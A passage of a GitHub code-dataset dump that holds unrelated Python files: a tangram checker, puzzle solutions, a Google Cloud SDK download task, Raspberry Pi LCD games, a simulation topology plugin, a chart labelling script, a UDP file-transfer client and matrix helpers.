reflectedPoints.add((int(x2), int(y2)))\n\n    return reflectedPoints\n\n\ndef 
getNormalisedPointsSet(pointsSet):\n normalisedPoints = set()\n pt = pointsSet.pop()\n minX, minY = pt[0], pt[1]\n pointsSet.add(pt)\n\n for point in pointsSet:\n if point[0] < minX:\n minX = point[0]\n if point[1] < minY:\n minY = point[1]\n # minY = point[1] if point[1] < minY\n\n for point in pointsSet:\n ptTuple = (int(point[0] - minX), int(point[1] - minY))\n normalisedPoints.add(ptTuple)\n\n return normalisedPoints\n\n\ndef check(coloured_pieces_1, coloured_pieces_2):\n for key in coloured_pieces_1:\n pointsList = coloured_pieces_1[key]\n\n pointsSet = set(pointsList)\n\n if key not in coloured_pieces_2:\n return False\n\n targetPoints = set(coloured_pieces_2[key])\n targetPoints = getNormalisedPointsSet(targetPoints)\n\n # Q4\n if pointsSet == targetPoints:\n continue\n\n normalisedPoints = getNormalisedPointsSet(pointsSet)\n if normalisedPoints == targetPoints:\n continue\n\n # Q1\n reflectedPoints = set()\n reflectedPoints = reflectionXaxis(normalisedPoints)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # Q3\n reflectedPoints.clear()\n normalisedPoints.clear()\n\n reflectedPoints = reflectionYaxis(pointsList)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # Q2\n reflectedPoints.clear()\n reflectedPoints = reflectionXaxis(normalisedPoints)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # mirroring\n # Q4\n mirroredPts = set()\n for point in pointsSet:\n ptTuple = (point[1], point[0])\n mirroredPts.add(ptTuple)\n\n if mirroredPts == targetPoints:\n continue\n\n # Q1\n reflectedPoints = reflectionXaxis(mirroredPts)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # Q3\n reflectedPoints = reflectionYaxis(mirroredPts)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # Q2\n reflectedPoints = reflectionXaxis(reflectedPoints)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints != targetPoints:\n return False\n\n return True\n\n\ndef is_solution(tangram, shape):\n\n # if not are_valid(tangram):\n # return False\n\n # check area\n areaTangram, areaShape = 0.0, 0.0\n\n for key in tangram:\n areaTangram += getAreaOfColoredPieces(tangram[key])\n\n for key in shape:\n areaShape += getAreaOfColoredPieces(shape[key])\n\n if areaTangram != areaShape:\n return False\n\n pieces, target = dict(), dict()\n if len(tangram.keys()) > 1:\n pieces, target = tangram, shape\n else:\n pieces, target = shape, tangram\n\n # check if point inside polygon\n allTargetValues = target.values()\n targetPoints = list()\n\n for value in allTargetValues:\n targetPoints = value\n\n increasedPoints1 = increaseSizeOfPolygon(targetPoints, 0.1, 0.0)\n increasedPoints2 = increaseSizeOfPolygon(targetPoints, 0.0, 0.1)\n increasedPoints3 = increaseSizeOfPolygon(targetPoints, 0.0, -0.1)\n increasedPoints4 = increaseSizeOfPolygon(targetPoints, -0.1, 0.0)\n polyPath = path.Path(increasedPoints1)\n\n for key in pieces:\n ptsList = pieces[key]\n\n inOutArray = polyPath.contains_points(ptsList)\n\n polyPath = path.Path(increasedPoints2)\n inOutArray2 = polyPath.contains_points(ptsList)\n \n\n polyPath = path.Path(increasedPoints3)\n inOutArray3 = polyPath.contains_points(ptsList)\n\n \n polyPath = path.Path(increasedPoints4)\n inOutArray4 = 
polyPath.contains_points(ptsList)\n\n        a1 = np.array(inOutArray)\n        a2 = np.array(inOutArray2)\n        a3 = np.array(inOutArray3)\n        a4 = np.array(inOutArray4)\n\n        z = a1 | a2 | a3 | a4\n\n        if not z.all():\n            return False\n\n    if doPiecesIntersectTarget(pieces, targetPoints):\n        return False\n\n    return True\n\n\ndef onSegment(ptA, ptB, ptC):\n\n    if (ptB[0] <= max(ptA[0], ptC[0]) and ptB[0] >= min(ptA[0], ptC[0]) and\n            ptB[1] <= max(ptA[1], ptC[1]) and ptB[1] >= min(ptA[1], ptC[1])):\n        return True\n\n    return False\n\n\ndef orientation(ptA, ptB, ptC):\n    val = (ptB[1] - ptA[1]) * (ptC[0] - ptB[0]) - (ptB[0] - ptA[0]) * (ptC[1] - ptB[1])\n\n    if (val == 0):\n        return 0 # colinear\n\n    if val > 0:\n        return 1\n    else:\n        return 2\n\n\ndef doIntersect(ptA, ptB, ptC, ptD):\n    o1 = orientation(ptA, ptB, ptC)\n    o2 = orientation(ptA, ptB, ptD)\n    o3 = orientation(ptC, ptD, ptA)\n    o4 = orientation(ptC, ptD, ptB)\n\n    if ((o1 != o2) and (o3 != o4)):\n        return True\n\n    # Special Cases\n    # ptA, ptB and ptC are colinear and ptC lies on segment ptAptB\n    if (o1 == 0 and onSegment(ptA, ptC, ptB)):\n        return True\n\n    # ptA, ptB and ptD are colinear and ptD lies on segment ptAptB\n    if (o2 == 0 and onSegment(ptA, ptD, ptB)): \n        return True\n\n    # ptC, ptD and ptA are colinear and ptA lies on segment ptCptD\n    if (o3 == 0 and onSegment(ptC, ptA, ptD)): \n        return True\n\n    # ptC, ptD and ptB are colinear and ptB lies on segment ptCptD\n    if (o4 == 0 and onSegment(ptC, ptB, ptD)): \n        return True\n\n    return False\n\n\ndef increaseSizeOfPolygon(targetPoints, xinc, yinc):\n    increasedPoints = list()\n    for ptTuple in targetPoints:\n        x = float(ptTuple[0]) + xinc\n        y = float(ptTuple[1]) + yinc\n        increasedPoints.append((x, y))\n    return increasedPoints\n\n\ndef doPiecesIntersectTarget(pieces, targetPoints):\n    tgPtLength = len(targetPoints)\n    for key in pieces:\n        ptList = pieces[key]\n        length = len(ptList)\n\n        for i in range(0, length+1):\n            ptA = ptList[i % length]\n            ptB = ptList[(i+1) % length]\n\n            for j in range(0, tgPtLength+1):\n                j = j % tgPtLength\n                ptC = targetPoints[j]\n                ptD = targetPoints[(j+1) % tgPtLength]\n\n                # if doIntersect(ptA, ptB, ptC, ptD):\n                #     return True\n\n                det0, det1 = 0, 0\n                det0 = checkOrientationFor2Points(ptA, ptB, ptC)\n                det1 = checkOrientationFor2Points(ptA, ptB, ptD)\n\n                if det0 != det1 != 0 :\n                    det0 = checkOrientationFor2Points(ptC, ptD, ptA)\n                    det1 = checkOrientationFor2Points(ptC, ptD, ptB)\n\n                    if det0 != det1 and det1 != 0 and det0 != 0:\n                        return True\n\n                else:\n                    continue\n    return False\n\ndef available_coloured_pieces(file):\n    coloured_pieces = dict()\n    coloured_pieces = readFile(file)\n    return coloured_pieces\n\n\ndef closed_segment_intersect(a, b, c, d):\n    \"\"\" Verifies if closed segments a, b, c, d do intersect.\n    \"\"\"\n    if a == b:\n        return a == c or a == d\n    if c == d:\n        return c == a or c == b\n\n    s1 = side(a, b, c)\n    s2 = side(a, b, d)\n\n    # All points are collinear\n    if s1 == 0 and s2 == 0:\n        return \\\n            is_point_in_closed_segment(a, b, c) or is_point_in_closed_segment(a, b, d) or \\\n            is_point_in_closed_segment(\n                c, d, a) or is_point_in_closed_segment(c, d, b)\n\n    # No touching and on the same side\n    if s1 and s1 == s2:\n        return False\n\n    s1 = side(c, d, a)\n    s2 = side(c, d, b)\n\n    # No touching and on the same side\n    if s1 and s1 == s2:\n        return False\n\n    return True\n\n# file = open('shape_A_1.xml')\n# shape = available_coloured_pieces(file)\n# file = open('tangram_A_2_a.xml')\n# tangram = available_coloured_pieces(file)\n# print(is_solution(tangram, 
shape))\n","repo_name":"yashtamakuwala/Tangram","sub_path":"tangram.py","file_name":"tangram.py","file_ext":"py","file_size_in_byte":12771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73409321067","text":"import sys\ninput = sys.stdin.readline\n\nn,m=map(int,input().split())\n\ndef backtracking(start,end,l,m):\n for i in range(start,end+1):\n if m == len(l) + 1:\n temp = l[:]\n temp.append(i)\n for j in temp:\n print(j,end=\" \")\n print()\n else:\n temp = l[:]\n temp.append(i)\n backtracking(i,end,temp,m)\n\nbacktracking(1,n,[],m)","repo_name":"Yun-YeoJun/BOJ_Python","sub_path":"solutions/bj15652.py","file_name":"bj15652.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35123215146","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.command_lib.storage import tracker_file_util\nfrom googlecloudsdk.command_lib.storage.tasks import task\nfrom googlecloudsdk.command_lib.storage.tasks.cp import download_util\nfrom googlecloudsdk.command_lib.util import crc32c\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\n\n\nclass FinalizeSlicedDownloadTask(task.Task):\n \"\"\"Performs final steps of sliced download.\"\"\"\n\n def __init__(self,\n source_resource,\n temporary_destination_resource,\n final_destination_resource,\n do_not_decompress=False):\n \"\"\"Initializes task.\n\n Args:\n source_resource (resource_reference.ObjectResource): Should contain\n object's metadata for checking content encoding.\n temporary_destination_resource (resource_reference.FileObjectResource):\n Must contain a local path to the temporary file written to during\n transfers.\n final_destination_resource (resource_reference.FileObjectResource): Must\n contain local filesystem path to the final download destination.\n do_not_decompress (bool): Prevents automatically decompressing\n downloaded gzips.\n \"\"\"\n super(FinalizeSlicedDownloadTask, self).__init__()\n self._source_resource = source_resource\n self._temporary_destination_resource = temporary_destination_resource\n self._final_destination_resource = final_destination_resource\n self._do_not_decompress = do_not_decompress\n\n def execute(self, task_status_queue=None):\n \"\"\"Validates and clean ups after sliced download.\"\"\"\n for message in self.received_messages:\n if message.topic is task.Topic.ERROR:\n log.error(message.payload)\n return\n\n temporary_object_path = (\n self._temporary_destination_resource.storage_url.object_name)\n final_destination_object_path = (\n self._final_destination_resource.storage_url.object_name)\n if (properties.VALUES.storage.check_hashes.Get() !=\n properties.CheckHashes.NEVER.value and\n self._source_resource.crc32c_hash):\n\n component_payloads = [\n message.payload\n for message in self.received_messages\n if message.topic == task.Topic.CRC32C\n ]\n if component_payloads:\n # Returns list of payload values sorted by component number.\n sorted_component_payloads = sorted(\n component_payloads, key=lambda d: d['component_number'])\n\n downloaded_file_checksum = sorted_component_payloads[0][\n 'crc32c_checksum']\n for i in range(1, len(sorted_component_payloads)):\n payload = sorted_component_payloads[i]\n downloaded_file_checksum = crc32c.concat_checksums(\n downloaded_file_checksum,\n payload['crc32c_checksum'],\n 
b_byte_count=payload['length'])\n\n        downloaded_file_hash_object = crc32c.get_crc32c_from_checksum(\n            downloaded_file_checksum)\n        downloaded_file_hash_digest = crc32c.get_hash(\n            downloaded_file_hash_object)\n\n        download_util.validate_download_hash_and_delete_corrupt_files(\n            temporary_object_path, self._source_resource.crc32c_hash,\n            downloaded_file_hash_digest)\n\n    download_util.decompress_or_rename_file(\n        self._source_resource,\n        temporary_object_path,\n        final_destination_object_path,\n        do_not_decompress_flag=self._do_not_decompress)\n\n    tracker_file_util.delete_download_tracker_files(\n        self._temporary_destination_resource.storage_url)\n","repo_name":"boostcampaitech2/final-project-level3-cv-15","sub_path":"serving/google-cloud-sdk/lib/googlecloudsdk/command_lib/storage/tasks/cp/finalize_sliced_download_task.py","file_name":"finalize_sliced_download_task.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3667393559","text":"import time, pygame, sys, threading, random, json\nimport Adafruit_Nokia_LCD as LCD\nimport Adafruit_GPIO.SPI as SPI\nfrom pygame.locals import *\nfrom PIL import Image, ImageDraw, ImageFont\n\n\ndef draw_main_menu():\n    #option currently chosen\n    draw.rectangle((0,0,LCD.LCDWIDTH-1, LCD.LCDHEIGHT-1), outline=0, fill=255)\n    font = ImageFont.truetype(\"data-latin.ttf\", size=12)\n    draw.text((19,3), 'SNAKE', font=font)\n    draw.text((20,17), '2048', font=font)\n    draw.text((20,31), 'QUIT', font=font)\n    return get_option()\n    \n\ndef get_option():\n    option = 0\n    points =[(3, 14*option+9), (4, 14*option+9), (5, 14*option+9),\n             (6, 14*option+9), (5, 14*option+8), (5, 14*option+10)]\n    draw.point(points, fill=0)\n    disp.image(image)\n    disp.display()\n    while True:\n        for event in pygame.event.get():\n            if event.type == QUIT:\n                pygame.quit()\n                sys.exit()\n            if event.type == KEYDOWN:\n                if event.key == pygame.K_UP:\n                    draw.point(points, fill=255)\n                    option = (option-1)%3\n                    points =[(3, 14*option+9), (4, 14*option+9),\n                             (5, 14*option+9),(6, 14*option+9),\n                             (5, 14*option+8), (5, 14*option+10)]\n                    draw.point(points, fill=0)\n                    disp.image(image)\n                    disp.display()\n                if event.key == pygame.K_DOWN:\n                    draw.point(points, fill=255)\n                    option = (option+1)%3\n                    points =[(3, 14*option+9), (4, 14*option+9),\n                             (5, 14*option+9),(6, 14*option+9),\n                             (5, 14*option+8), (5, 14*option+10)]\n                    draw.point(points, fill=0)\n                    disp.image(image)\n                    disp.display()\n                if event.key == pygame.K_RETURN:\n                    return option\n        # depending on the option, display at 14*options +9\n        time.sleep(0.2)\n\n\ndef start():\n    while True: \n        opcja = draw_main_menu()\n        if opcja == 0:\n            import snejk\n            #turn snejk into a class\n            snejk.Snejk(disp,draw,image)\n        elif opcja == 1:\n            import true2048\n            t = true2048.TwoZeroFourEight(disp, draw, image)\n        else:\n            pygame.quit()\n            sys.exit()\n    \n    \npygame.init()\nscreen = pygame.display.set_mode((101,101))\npygame.display.set_caption('.')\npygame.event.set_allowed(None)\npygame.event.set_allowed([QUIT, KEYDOWN])\n#initialize display\n#20 -- D/C\n#12 -- RST\n \nDC = 20\nRST = 12\nSPI_PORT = 0\nSPI_DEVICE = 0\ndisp = LCD.PCD8544(DC, RST, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE,\n                                           max_speed_hz=4000000))\ndisp.begin(contrast = 50)\ndisp.clear()\ntime.sleep(2)\ndisp.display()\n\nimage = Image.new('1', (LCD.LCDWIDTH, LCD.LCDHEIGHT))\ndraw = ImageDraw.Draw(image)\n\n#draw rectangle\ndraw.rectangle((0,0,LCD.LCDWIDTH-1, LCD.LCDHEIGHT-1), outline=0, 
fill=255)\nstart()\n","repo_name":"AjEmLewy/RaspberryPiNokiaGames","sub_path":"gamepack.py","file_name":"gamepack.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10207421016","text":"def split(inF):\n inFile = open(inF)\n ouFile1 = open(inF.split('.txt')[0] + '.intron.txt', 'w')\n ouFile2 = open(inF.split('.txt')[0] + '.other.txt', 'w')\n head = inFile.readline()\n ouFile1.write(head)\n ouFile2.write(head)\n for line in inFile:\n fields = line.split('\\t')\n if fields[8] in ['INTRON','DOWNSTREAM', 'UPSTREAM', 'INTRAGENIC']:\n ouFile1.write(line)\n else:\n ouFile2.write(line)\n \n inFile.close()\n ouFile1.close()\n ouFile2.close()\n\nsplit('Variation-All_ACEonly.txt')\n","repo_name":"chw333/StanfordSGTC","sub_path":"DCM/04-Gene/vsACE/04-split.py","file_name":"04-split.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70773017066","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWell-mixed topology in which each node is a neighbor of every other node.\n\nThis topology is modeled as a graph with no edges between the nodes. Although\na complete graph would perhaps model a well-mixed topology more accurately,\nthis would prohibit large populations due to the associated memory\nrequirements.\n\nNodes are given a randomly-assigned location to more easily allow for\nvisualization. It should be noted that in this topology, interactions\nare not localized, so the neighbors with which a node interacts will\nbe located throughout the environment.\n\n\"\"\"\n\n__author__ = \"Brian Connelly \"\n__credits__ = \"Brian Connelly\"\n\nimport random\nimport networkx as nx\n\nfrom seeds.Plugin import *\nfrom seeds.SEEDSError import *\nfrom seeds.Topology import *\n\n\nclass WellMixedTopology(Topology, Plugin):\n \"\"\"\n Well-mixed topology with a configurable number of interactions\n\n Configuration: All configuration options should be specified in the\n WellMixedTopology block (unless otherwise specified by the\n config_section parameter).\n\n size\n Total number of nodes in the population\n num_interactions\n When a node is updated, a list of neighbors is passed to it.\n This parameter specifies the size of a random subset of nodes\n to be used as this neighbor set. 
By default, all nodes in\n the populaion are passed as neighbors.\n dimensions\n The number of dimensions in space that this topology occupies.\n (default: 2)\n\n Example:\n [WellMixedTopology]\n size = 100000\n num_interactions = 10\n\n\n \"\"\"\n\n __name__ = \"WellMixedTopology\"\n __version__ = (1,0)\n __author__ = \"Brian Connelly \"\n __credits__ = \"Brian Connelly\"\n __description__ = \"Well-mixed (unstructured) population in which each node is equally likely to interact with any other node.\"\n __type__ = 2 \n __requirements__ = []\n\n def __init__(self, experiment, label=None):\n \"\"\"Initialize a WellMixedTopology object\n\n Parameters:\n\n *experiment*\n A reference to the Experiment\n *label*\n A unique string identifying the configuration for this topology\n\n \"\"\"\n\n super(WellMixedTopology, self).__init__(experiment, label=label)\n\n if self.label:\n self.config_section=\"%s:%s\" % (\"WellMixedTopology\", label)\n else:\n self.config_section=\"%s\" % (\"WellMixedTopology\")\n\n self.size = self.experiment.config.getint(section=self.config_section,\n name='size')\n self.num_interactions = self.experiment.config.getint(section=self.config_section,\n name='num_interactions',\n default=self.size)\n self.dimensions = self.experiment.config.getint(section=self.config_section,\n name=\"dimensions\",\n default=2)\n if not self.size:\n raise ConfigurationError(\"WellMixedTopology: size must be defined\")\n elif self.size < 1:\n raise ConfigurationError(\"WellMixedTopology: size must be greater than 0\")\n elif self.num_interactions < 0:\n raise ConfigurationError(\"WellMixedTopology: num_interactions must be non-negative\")\n elif self.num_interactions > self.size:\n raise ConfigurationError(\"WellMixedTopology: num_interactions can not exceed size\")\n elif self.dimensions < 1:\n raise ConfigurationError(\"GrowthTopology: Number of dimensions must be at least 1\")\n\n self.graph = nx.empty_graph()\n self.graph.name = \"well_mixed_graph\"\n self.graph.add_nodes_from(list(range(self.size)))\n\n for n in self.graph.nodes():\n self.graph.node[n]['coords'] = tuple([random.random() for i in xrange(self.dimensions)])\n\n def __str__(self):\n \"\"\"Produce a string to be used when an object is printed\"\"\"\n return \"Well-Mixed Topology (%d nodes, %d interactions)\" % (self.size, self.num_interactions)\n\n def get_neighbors(self, node):\n \"\"\"Get a randomly-selected list of neighboring nodes (IDs) for a given node\n\n Parameters:\n\n *node*\n The ID of the node whose neighboring nodes to get\n\n \"\"\"\n\n return random.sample(self.graph.nodes(), self.num_interactions)\n\n def add_edge(self, src, dest):\n \"\"\"Add an edge to the graph. Not supported by this topology type\"\"\"\n raise ConfigurationError(\"add_edge is not supported by WellMixedTopology\")\n return\n\n def remove_edge(self, src, dest):\n \"\"\"Remove an edge from the graph. Not supported by this topology\n type\"\"\"\n raise ConfigurationError(\"remove_edge is not supported by WellMixedTopology\")\n return\n\n def add_node(self, id=-1, neighbors=[]):\n \"\"\"Add a node to the graph. Topologies that do not wish to support\n this should redefine this method to do nothing. This method will\n not place a Cell or ResourceCell in the newly-created node. That\n will need to be done separately.\n\n Note that since edges aren't used in this topology, the neighbors\n argument is ignored.\n\n Parameters:\n\n id\n The ID to use for the new node. 
If none is specified (or -1), the\n ID used will be the current largest ID in the graph plus 1.\n neighbors\n An optional list of node IDs that will be connected to the new node\n via an edge. NonExistentNodeError will be raised if any of these\n nodes do not exist. ***This argument is ignored***\n\n \"\"\"\n\n if id == -1:\n self.graph.add_node(max(self.graph.nodes()) + 1)\n else:\n self.graph.add_node(id)\n\n self.graph.node[id]['coords'] = (random.random(),random.random())\n\n","repo_name":"briandconnelly/seeds","sub_path":"seeds/plugins/topology/WellMixedTopology.py","file_name":"WellMixedTopology.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"21897964650","text":"import pandas as pd\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport mplfinance as fplt\nimport pandas as pd\nfrom datetime import datetime as dt\nimport matplotlib.dates as mpdates\n\nplt.ion()\ndts = [ ]\ncdf = pd.read_csv('chart1.csv')\n#cdf = pd.read_csv('market_1H_grey.csv')\nfor row in cdf.itertuples():\n rdt = row.Date + ' ' + row.Time\n dtm = dt.strptime(rdt, \"%m/%d/%Y %H:%M\")\n dts.append(dtm)\n\ncols = ['Open','High','Low','Close']\ndf = cdf[cols]\n\ndti = pd.DatetimeIndex(dts)\ndf.set_index(dti, inplace=True) \n\nprint(df)\n\nfor bar in range(5, len(df)):\n wdf = df[bar-5:bar]\n highest_low = max(wdf['Low'])\n lowest_high = min(wdf['High'])\n if (highest_low > lowest_high):\n continue\n\n fplt.plot(wdf, type='candle', style='charles',\n title='Ovelapping Labelling',\n ylabel='Price ($)')\n\n plt.show(block=False)\n plt.pause(0.001)\n input(\"Overlapping?\");\n plt.close('all')\n","repo_name":"karlfe/trading","sub_path":"chart/ovrlp_label.py","file_name":"ovrlp_label.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25605484111","text":"import socket\nimport sys\nimport time\n\n# Base variables and consts.\nIP_ADDR = sys.argv[2]\nPORT = int(sys.argv[1])\nFILE_NAME = sys.argv[3]\nDEFAULT_TIMEOUT = 5\nMSS = 97\nADDR = (IP_ADDR, PORT)\nNULL = b'0'\nFIN_MSG = b'FIN'\nSYN_MSG = b'SYN'\nMAX_PORT = 65535\n\n\n# Data Class - will hold all information of packages needed to be sent and ack received.\nclass Data:\n # Constructor - initialize variables and split file into small chunks.\n def __init__(self, file_name):\n try:\n data = open(file_name, \"rb\").read()\n except OSError:\n print(\"Cannot open or read file\")\n s.close()\n sys.exit()\n # Make new array of bytes from current file, to each segment add 3-byte long sequence number.\n self.data_arr = [(data[i:i + MSS] + int((i / MSS)).to_bytes(3, 'little')) for i in range(0, len(data), MSS)]\n # Size of the array.\n self.arr_size_bytes = (len(self.data_arr)).to_bytes(3, 'little')\n # Counter to hold the amount of packages received.\n self.received_coutner = 0\n\n # Iterator made for giving the next package in line that did not received ack for.\n def __iter__(self):\n self.iter = 0\n return self\n\n def __next__(self):\n # While we didn't reach the end of the array look for a package that have not received ack for.\n while self.iter < len(self.data_arr):\n # if found return it.\n if self.data_arr[self.iter] != NULL:\n temp = self.iter\n self.iter += 1\n return self.data_arr[temp]\n self.iter += 1\n raise StopIteration\n\n # notify_ack - Method will update the current list for the ack received, if new ack will increase received_counter.\n 
def notify_ack(self, index):\n        if self.data_arr[index] != NULL:\n            self.data_arr[index] = NULL\n            self.received_coutner += 1\n\n    # get_size - as simple as it gets, returns size.\n    def get_size(self):\n        return self.arr_size_bytes\n\n    # done_acking - returns true if all acks have been received, otherwise false.\n    def done_acking(self):\n        if self.received_coutner == len(self.data_arr):\n            return True\n        return False\n\n\n# Sync method will be in charge of synchronizing connection with the server.\ndef syn():\n    syn_msg = SYN_MSG + data_toSend.get_size()\n    s.sendto(syn_msg, (IP_ADDR, PORT))\n    # 2-way handshake as the server is not communicating back but only receives data and approves it.\n    try:\n        get_syn, addr = s.recvfrom(100)\n        if get_syn != syn_msg:\n            syn()\n        else:\n            send_pkgs()\n    except socket.timeout:\n        # in case of drop, re-send package.\n        syn()\n\n\n# will be in-charge of sending the packages that have not received an ack yet.\ndef send_pkgs():\n    for pkg in data_toSend:\n        s.sendto(pkg, ADDR)\n    mark_acks()\n\n\n# will be in-charge of checking which acks have been received and marking the packages for future sending.\ndef mark_acks():\n    try:\n        # while still un-resolved packages in buffer keep marking them.\n        while True:\n            data_ack, address = s.recvfrom(100)\n            # if message is fin message go to fin and finish the connection.\n            if data_ack == FIN_MSG:\n                fin()\n            # if syn message was found again meaning server did not receive last one, client will resend it.\n            if data_ack == SYN_MSG:\n                syn()\n            # otherwise store the ack received and mark the package.\n            pkg_num = int.from_bytes(data_ack[-3:len(data_ack)], 'little')\n            data_toSend.notify_ack(pkg_num)\n\n    except socket.timeout:\n        if not data_toSend.done_acking():\n            send_pkgs()\n\n\n# fin method will be in-charge of finishing communication with the server.\ndef fin():\n    try:\n        s.sendto(FIN_MSG, (IP_ADDR, PORT))\n        fin_ack, address = s.recvfrom(100)\n        if fin_ack != FIN_MSG:\n            fin()\n        else:\n            s.close()\n            sys.exit()\n    except socket.timeout:\n        fin()\n\n\n# validates IP address's format\ndef validate_ip():\n    ip_parts = IP_ADDR.split(\".\")\n\n    if len(ip_parts) != 4:\n        return False\n\n    for part in ip_parts:\n        if not isinstance(int(part), int):\n            return False\n\n        if int(part) < 0 or int(part) > 255:\n            return False\n\n    return True\n\n\n# checks arguments before starting.\ndef args_check():\n    try:\n        if MAX_PORT < int(PORT) or int(PORT) < 0:\n            raise ValueError(\"Port is not in the correct range\")\n\n        if len(sys.argv) != 4:\n            raise ValueError(\"Wrong amount of arguments.\")\n\n        if not validate_ip():\n            raise ValueError(\"Wrong IP address format.\")\n\n    except:\n        s.close()\n        sys.exit()\n\n\n# UDP socket initialisation\nargs_check()\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.settimeout(DEFAULT_TIMEOUT)\n\ndata_toSend = Data(FILE_NAME)\nsyn()\n","repo_name":"Etelis/TCP-over-UDP","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32509272208","text":"# Day 6B - how many fish are there at day 256?\n# In theory I could just change my loop from day_6A to run all the way through range(256)...\n# ... 
# but rough math says the loop would take several thousand years to finish.\n# Instead, I'm going to figure out how many fish are generated from one fish in 128 days (for each \"starting status\")\n# Then figure out how many fish are generated in 256 days from one fish\n# Then multiply those estimates by the distribution of actual starting fish to get our final answer.\n\nimport pandas as pd\nimport numpy as np\n\ndata = pd.read_csv('data/day6.csv', header = None)\nschool_of_fish = data.iloc[0].values.tolist()\n\n# Get a dictionary with the initial distribution by 'day count status'\ninitial_distribution = np.unique(school_of_fish, return_counts = True)\ninitial_distribution = dict(zip(*initial_distribution))\n\n# Map out how many fish are generated by one fish of each 'day count status' and the distribution of those fish\nmapping_128 = {}\nfor i in range(9):\n example_schools = [i]\n for day in range(128):\n new_school = []\n # the list keeps a constant length inside this loop (one pop, one append),\n # so iterating len(example_schools) times pops every fish exactly once\n for _ in range(len(example_schools)):\n fish = example_schools.pop(0)\n if fish == 0:\n new_school.append(8)\n example_schools.append(6)\n\n else:\n fish -= 1\n example_schools.append(fish)\n\n for each in new_school:\n example_schools.append(each)\n\n summary = np.unique(example_schools, return_counts = True)\n summary = dict(zip(*summary))\n\n mapping_128[i] = (summary)\n\n# Translate the mapping into a total generated population from each initial fish\nmapping_totals_128 = {}\nfor i in range(9):\n mapping_totals_128[i] = sum(mapping_128[i].values())\n\n# Translate these 128 day figures into 256 (basically figure out the generated population from each fish at 128 days)\ntotal_fish_256 = {}\nfor i in range(9):\n temp_fish = []\n for j in range(9):\n try:\n temp_fish.append(mapping_totals_128[j] * mapping_128[i][j])\n except KeyError:\n pass\n total_fish_256[i] = sum(temp_fish)\n\n# Okay, now that I know how many fish are generated by a starting fish of each day status, I can calculate the total fish\nfinal_fish = []\nfor i in range(6):\n try:\n final_fish.append(initial_distribution[i] * total_fish_256[i])\n except KeyError:\n pass\n\n# Et voila\nprint(sum(final_fish))\n","repo_name":"conordurkin/adventofcode21","sub_path":"day_6B.py","file_name":"day_6B.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26232474698","text":"\"\"\"\nA matrix will be an N sized list of 4 element lists.\nEach individual list will represent an [x, y, z, 1] point.\nFor multiplication purposes, consider the lists like so:\nx0 x1 xn\ny0 y1 yn\nz0 z1 ... zn\n1 1 1\n\"\"\"\n
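# (Added example, not in the original:) under this column-major convention\n# the single point (2, 3, 4) is stored as the column [2, 3, 4, 1], so a\n# two-point matrix is [[2, 3, 4, 1], [5, 6, 7, 1]].\n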
import math\n\n#print the matrix such that it looks like\n#the template in the top comment\ndef print_matrix( matrix ):\n s = \"\"\n current_spaces = 5\n for c in range(len(matrix[0])):\n s += \"\\n\"\n for r in range(len(matrix)):\n s += str(matrix[r][c])\n # if current_spaces < how_manyDigits(matrix[r][c]):\n # current_spaces += 1\n for i in range(current_spaces - how_manyDigits(matrix[r][c])):\n s += \" \"\n s += \"\\n\"\n print(s)\n\ndef how_manyDigits(n):\n if (n == 0):\n return 1\n i = 0\n number_of_digits = 0\n for i in range(10):\n if (10 ** i) <= n:\n number_of_digits += 1\n return number_of_digits\n\n # for rows in matrix:\n # print(rows)\n\n#turn the parameter matrix into an identity matrix\n#you may assume matrix is square\ndef ident( matrix ):\n columns = len(matrix[0])\n rows = columns #matrix is assumed to be a square\n for r in range(rows):\n for c in range(columns):\n if (r == c):\n matrix[r][c] = 1\n else:\n matrix[r][c] = 0\n return matrix\n\n#multiply m1 by m2, modifying m2 to be the product\n#m1 * m2 -> m2\n\n\ndef matrix_mult( m1, m2 ):\n rows = len(m1[0])\n columns = len(m2)\n temp = new_matrix(rows, columns)\n for row in range(rows):\n for col in range(columns):\n temp[col][row] = sum([(m1[k][row] * m2[col][k]) for k in range(len(m2[0]))])\n del m2[:]\n for col in temp:\n m2.append(col)\n\n\ndef new_matrix(rows = 4, cols = 4):\n m = []\n for c in range( cols ):\n m.append( [] )\n for r in range( rows ):\n m[c].append( 0 )\n return 